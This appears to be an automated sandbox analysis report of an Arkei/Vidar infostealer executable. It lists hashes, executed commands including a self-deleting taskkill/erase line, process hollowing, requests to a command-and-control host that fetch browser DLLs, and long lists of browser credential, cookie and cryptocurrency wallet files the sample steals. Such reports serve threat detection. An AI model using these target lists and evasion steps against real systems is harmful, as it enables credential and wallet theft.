paladin316

1273Exes_105f94e56d5fc9fc7555aef13e0af78e_exe_2019-09-06_18_30.txt

Sep 6th, 2019
  1.  
  2. * ID: 1273
  3. * MalFamily: "Arkei"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
  8. * File Size: 722944
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
  11. * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
  12. * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
  13. * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
  14. * CRC32: "BF36EC09"
  15. * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
  16.  
  17. * Process Execution:
  18. "8JB5A.exe",
  19. "8JB5A.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe",
  27. "taskeng.exe",
  28. "taskeng.exe",
  29. "msoia.exe",
  30. "msoia.exe",
  31. "taskeng.exe",
  32. "taskeng.exe",
  33. "WMIADAP.exe"
  34.  
  35.  
  36. * Executed Commands:
  37. "\"C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe\"",
  38. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
  39. "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
  40. "C:\\Windows\\system32\\lsass.exe",
  41. "taskkill /im 8JB5A.exe /f",
  42. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  43. "taskeng.exe 633E54B2-2944-4AC4-90FA-C69D6C08EDCB S-1-5-18:NT AUTHORITY\\System:Service:",
  44. "taskeng.exe 55EB258C-A9EA-4DA4-A8EF-E736F5A950CE S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  45. "taskeng.exe C47FF73B-279F-4D5D-8B65-FD7750272025 S-1-5-18:NT AUTHORITY\\System:Service:",
  46. "taskeng.exe 67AD5638-AA7B-49DE-8A67-3D392C370D2A S-1-5-18:NT AUTHORITY\\System:Service:",
  47. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
  48. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
  49. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
  50.  
  51.  
  52. * Signatures Detected:
  53.  
  54. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  55. "Details":
  56.  
  57.  
  58. "Description": "Behavioural detection: Executable code extraction",
  59. "Details":
  60.  
  61.  
  62. "Description": "Anomalous file deletion behavior detected (10+)",
  63. "Details":
  64.  
  65. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656"
  66.  
  67.  
  68. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671"
  69.  
  70.  
  71. "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671"
  72.  
  73.  
  74. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  75.  
  76.  
  77. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  78.  
  79.  
  80. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  81.  
  82.  
  83. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  84.  
  85.  
  86. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  87.  
  88.  
  89. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  90.  
  91.  
  92. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt"
  93.  
  94.  
  95. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill"
  96.  
  97.  
  98. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt"
  99.  
  100.  
  101. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC"
  102.  
  103.  
  104. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
  105.  
  106.  
  107. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
  108.  
  109.  
  110. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
  111.  
  112.  
  113. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies"
  114.  
  115.  
  116. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt"
  117.  
  118.  
  119. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt"
  120.  
  121.  
  122. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads"
  123.  
  124.  
  125. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt"
  126.  
  127.  
  128. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History"
  129.  
  130.  
  131. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt"
  132.  
  133.  
  134. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt"
  135.  
  136.  
  137. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg"
  138.  
  139.  
  140. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy"
  141.  
  142.  
  143. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft"
  144.  
  145.  
  146. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin"
  147.  
  148.  
  149. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin"
  150.  
  151.  
  152. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin"
  153.  
  154.  
  155. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore"
  156.  
  157.  
  158. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin"
  159.  
  160.  
  161. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin"
  162.  
  163.  
  164. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash"
  165.  
  166.  
  167. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum"
  168.  
  169.  
  170. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC"
  171.  
  172.  
  173. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum"
  174.  
  175.  
  176. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus"
  177.  
  178.  
  179. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin"
  180.  
  181.  
  182. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko"
  183.  
  184.  
  185. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin"
  186.  
  187.  
  188. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD"
  189.  
  190.  
  191. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin"
  192.  
  193.  
  194. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin"
  195.  
  196.  
  197. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin"
  198.  
  199.  
  200. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX"
  201.  
  202.  
  203. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin"
  204.  
  205.  
  206. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin"
  207.  
  208.  
  209. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin"
  210.  
  211.  
  212. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge"
  213.  
  214.  
  215. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin"
  216.  
  217.  
  218. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin"
  219.  
  220.  
  221. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin"
  222.  
  223.  
  224. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin"
  225.  
  226.  
  227. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash"
  228.  
  229.  
  230. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets"
  231.  
  232.  
  233. "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip"
  234.  
  235.  
  236. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe"
  237.  
  238.  
  239. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  240.  
  241.  
  242.  
  243.  
  244. "Description": "Guard pages use detected - possible anti-debugging.",
  245. "Details":
  246.  
  247.  
  248. "Description": "A process attempted to delay the analysis task.",
  249. "Details":
  250.  
  251. "Process": "taskeng.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds"
  252.  
  253.  
  254. "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  255.  
  256.  
  257.  
  258.  
  259. "Description": "Performs HTTP requests potentially not found in PCAP.",
  260. "Details":
  261.  
  262. "url_ioc": "dersed.com:80//288"
  263.  
  264.  
  265. "url_ioc": "dersed.com:80//freebl3.dll"
  266.  
  267.  
  268. "url_ioc": "dersed.com:80//mozglue.dll"
  269.  
  270.  
  271. "url_ioc": "dersed.com:80//msvcp140.dll"
  272.  
  273.  
  274. "url_ioc": "dersed.com:80//nss3.dll"
  275.  
  276.  
  277. "url_ioc": "dersed.com:80//softokn3.dll"
  278.  
  279.  
  280. "url_ioc": "dersed.com:80//vcruntime140.dll"
  281.  
  282.  
  283. "url_ioc": "ip-api.com:80//line/"
  284.  
  285.  
  286.  
  287.  
  288. "Description": "A process created a hidden window",
  289. "Details":
  290.  
  291. "Process": "8JB5A.exe -> C:\\Windows\\System32\\cmd.exe"
  292.  
  293.  
  294.  
  295.  
  296. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  297. "Details":
  298.  
  299. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  300.  
  301.  
  302. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  303.  
  304.  
  305. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  306.  
  307.  
  308. "suspicious_request_iocs": "http://dersed.com/288"
  309.  
  310.  
  311. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  312.  
  313.  
  314. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  315.  
  316.  
  317. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  318.  
  319.  
  320. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  321.  
  322.  
  323. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  324.  
  325.  
  326. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  327.  
  328.  
  329. "suspicious_request_iocs": "http://ip-api.com/line/"
  330.  
  331.  
  332. "suspicious_request_iocs": "http://dersed.com/"
  333.  
  334.  
  335.  
  336.  
  337. "Description": "Performs some HTTP requests",
  338. "Details":
  339.  
  340. "url_iocs": "http://dersed.com/288"
  341.  
  342.  
  343. "url_iocs": "http://dersed.com/freebl3.dll"
  344.  
  345.  
  346. "url_iocs": "http://dersed.com/mozglue.dll"
  347.  
  348.  
  349. "url_iocs": "http://dersed.com/msvcp140.dll"
  350.  
  351.  
  352. "url_iocs": "http://dersed.com/nss3.dll"
  353.  
  354.  
  355. "url_iocs": "http://dersed.com/softokn3.dll"
  356.  
  357.  
  358. "url_iocs": "http://dersed.com/vcruntime140.dll"
  359.  
  360.  
  361. "url_iocs": "http://ip-api.com/line/"
  362.  
  363.  
  364. "url_iocs": "http://dersed.com/"
  365.  
  366.  
  367.  
  368.  
  369. "Description": "The binary likely contains encrypted or compressed data.",
  370. "Details":
  371.  
  372. "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
  373.  
  374.  
  375.  
  376.  
  377. "Description": "Uses Windows utilities for basic functionality",
  378. "Details":
  379.  
  380. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  381.  
  382.  
  383. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  384.  
  385.  
  386. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  387.  
  388.  
  389.  
  390.  
  391. "Description": "Behavioural detection: Injection (Process Hollowing)",
  392. "Details":
  393.  
  394. "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
  395.  
  396.  
  397.  
  398.  
  399. "Description": "Executed a process and injected code into it, probably while unpacking",
  400. "Details":
  401.  
  402. "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
  403.  
  404.  
  405.  
  406.  
  407. "Description": "Deletes its original binary from disk",
  408. "Details":
  409.  
  410.  
  411. "Description": "Behavioural detection: Injection (inter-process)",
  412. "Details":
  413.  
  414.  
  415. "Description": "Steals private information from local Internet browsers",
  416. "Details":
  417.  
  418. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  419.  
  420.  
  421. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  422.  
  423.  
  424. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
  425.  
  426.  
  427. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
  428.  
  429.  
  430. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
  431.  
  432.  
  433. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  434.  
  435.  
  436. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  437.  
  438.  
  439.  
  440.  
  441. "Description": "Collects information about installed applications",
  442. "Details":
  443.  
  444. "Program": "Google Update Helper"
  445.  
  446.  
  447. "Program": "Microsoft Excel MUI 2013"
  448.  
  449.  
  450. "Program": "Microsoft Outlook MUI 2013"
  451.  
  452.  
  453.  
  454.  
  455. "Program": "Google Chrome"
  456.  
  457.  
  458. "Program": "Adobe Flash Player 29 NPAPI"
  459.  
  460.  
  461. "Program": "Adobe Flash Player 29 ActiveX"
  462.  
  463.  
  464. "Program": "Microsoft DCF MUI 2013"
  465.  
  466.  
  467. "Program": "Microsoft Access MUI 2013"
  468.  
  469.  
  470. "Program": "Microsoft Office Proofing Tools 2013 - English"
  471.  
  472.  
  473. "Program": "Adobe Acrobat Reader DC"
  474.  
  475.  
  476. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  477.  
  478.  
  479. "Program": "Microsoft Publisher MUI 2013"
  480.  
  481.  
  482. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  483.  
  484.  
  485. "Program": "Microsoft Office Shared MUI 2013"
  486.  
  487.  
  488. "Program": "Microsoft Office OSM MUI 2013"
  489.  
  490.  
  491. "Program": "Microsoft InfoPath MUI 2013"
  492.  
  493.  
  494. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  495.  
  496.  
  497. "Program": "Microsoft Word MUI 2013"
  498.  
  499.  
  500. "Program": "Microsoft Groove MUI 2013"
  501.  
  502.  
  503.  
  504.  
  505. "Program": "Microsoft Access Setup Metadata MUI 2013"
  506.  
  507.  
  508. "Program": "Microsoft Office OSM UX MUI 2013"
  509.  
  510.  
  511. "Program": "Java Auto Updater"
  512.  
  513.  
  514. "Program": "Microsoft PowerPoint MUI 2013"
  515.  
  516.  
  517. "Program": "Microsoft Office Professional Plus 2013"
  518.  
  519.  
  520. "Program": "Adobe Refresh Manager"
  521.  
  522.  
  523. "Program": "Microsoft Office Proofing 2013"
  524.  
  525.  
  526. "Program": "Microsoft Lync MUI 2013"
  527.  
  528.  
  529.  
  530.  
  531. "Program": "Microsoft OneNote MUI 2013"
  532.  
  533.  
  534.  
  535.  
  536. "Description": "Stack pivoting was detected when using a critical API",
  537. "Details":
  538.  
  539. "process": "WmiPrvSE.exe:3968"
  540.  
  541.  
  542.  
  543.  
  544. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  545. "Details":
  546.  
  547. "MicroWorld-eScan": "Trojan.GenericKD.32387802"
  548.  
  549.  
  550. "FireEye": "Generic.mg.105f94e56d5fc9fc"
  551.  
  552.  
  553. "McAfee": "RDN/Generic.grp"
  554.  
  555.  
  556. "AegisLab": "Trojan.MSIL.Chapak.4!c"
  557.  
  558.  
  559. "K7AntiVirus": "Trojan ( 005573d61 )"
  560.  
  561.  
  562. "K7GW": "Trojan ( 005573d61 )"
  563.  
  564.  
  565. "Cybereason": "malicious.04a655"
  566.  
  567.  
  568. "Arcabit": "Trojan.Generic.D1EE32DA"
  569.  
  570.  
  571. "Invincea": "heuristic"
  572.  
  573.  
  574. "Symantec": "ML.Attribute.HighConfidence"
  575.  
  576.  
  577. "APEX": "Malicious"
  578.  
  579.  
  580. "Paloalto": "generic.ml"
  581.  
  582.  
  583. "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
  584.  
  585.  
  586. "BitDefender": "Trojan.GenericKD.32387802"
  587.  
  588.  
  589. "Avast": "Win32:Trojan-gen"
  590.  
  591.  
  592. "Ad-Aware": "Trojan.GenericKD.32387802"
  593.  
  594.  
  595. "Sophos": "Mal/Generic-S"
  596.  
  597.  
  598. "DrWeb": "Trojan.Inject3.20236"
  599.  
  600.  
  601. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
  602.  
  603.  
  604. "Emsisoft": "Trojan.GenericKD.32387802 (B)"
  605.  
  606.  
  607. "SentinelOne": "DFI - Malicious PE"
  608.  
  609.  
  610. "Microsoft": "Trojan:MSIL/CryptInject"
  611.  
  612.  
  613. "Endgame": "malicious (moderate confidence)"
  614.  
  615.  
  616. "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
  617.  
  618.  
  619. "GData": "Trojan.GenericKD.32387802"
  620.  
  621.  
  622. "Acronis": "suspicious"
  623.  
  624.  
  625. "MAX": "malware (ai score=100)"
  626.  
  627.  
  628. "Malwarebytes": "Spyware.Vidar"
  629.  
  630.  
  631. "ESET-NOD32": "a variant of Generik.LSRSOXR"
  632.  
  633.  
  634. "Ikarus": "Trojan.SuspectCRC"
  635.  
  636.  
  637. "MaxSecure": "Trojan.Malware.300983.susgen"
  638.  
  639.  
  640. "Fortinet": "MSIL/Malicious_Behavior.VEX"
  641.  
  642.  
  643. "Webroot": "W32.Trojan.Emotet"
  644.  
  645.  
  646. "AVG": "Win32:Trojan-gen"
  647.  
  648.  
  649. "Panda": "Trj/GdSda.A"
  650.  
  651.  
  652. "CrowdStrike": "win/malicious_confidence_100% (W)"
  653.  
  654.  
  655. "Qihoo-360": "Win32/Trojan.973"
  656.  
  657.  
  658.  
  659.  
  660. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  661. "Details":
  662.  
  663.  
  664. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  665. "Details":
  666.  
  667. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  668.  
  669.  
  670. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12"
  671.  
  672.  
  673. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\*.*"
  674.  
  675.  
  676. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  677.  
  678.  
  679. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n"
  680.  
  681.  
  682. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  683.  
  684.  
  685. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  686.  
  687.  
  688. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\*.*"
  689.  
  690.  
  691. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  692.  
  693.  
  694. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\*.*"
  695.  
  696.  
  697. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\"
  698.  
  699.  
  700. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  701.  
  702.  
  703. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\*.*"
  704.  
  705.  
  706. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\"
  707.  
  708.  
  709. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  710.  
  711.  
  712. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  713.  
  714.  
  715. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  716.  
  717.  
  718. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\"
  719.  
  720.  
  721. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\*.*"
  722.  
  723.  
  724. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  725.  
  726.  
  727. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\*.*"
  728.  
  729.  
  730. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  731.  
  732.  
  733. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  734.  
  735.  
  736. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\"
  737.  
  738.  
  739. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  740.  
  741.  
  742. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\*.*"
  743.  
  744.  
  745. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  746.  
  747.  
  748. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\"
  749.  
  750.  
  751. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\"
  752.  
  753.  
  754. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  755.  
  756.  
  757. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  758.  
  759.  
  760. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\*.*"
  761.  
  762.  
  763. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  764.  
  765.  
  766. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\*.*"
  767.  
  768.  
  769. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\"
  770.  
  771.  
  772. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  773.  
  774.  
  775. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  776.  
  777.  
  778. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\"
  779.  
  780.  
  781. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\*.*"
  782.  
  783.  
  784. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  785.  
  786.  
  787. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  788.  
  789.  
  790. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  791.  
  792.  
  793. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\"
  794.  
  795.  
  796. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\*.*"
  797.  
  798.  
  799. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\"
  800.  
  801.  
  802. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  803.  
  804.  
  805. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\*.*"
  806.  
  807.  
  808. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  809.  
  810.  
  811. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\*.*"
  812.  
  813.  
  814. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  815.  
  816.  
  817. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  818.  
  819.  
  820. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\"
  821.  
  822.  
  823. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  824.  
  825.  
  826. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\"
  827.  
  828.  
  829. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\*.*"
  830.  
  831.  
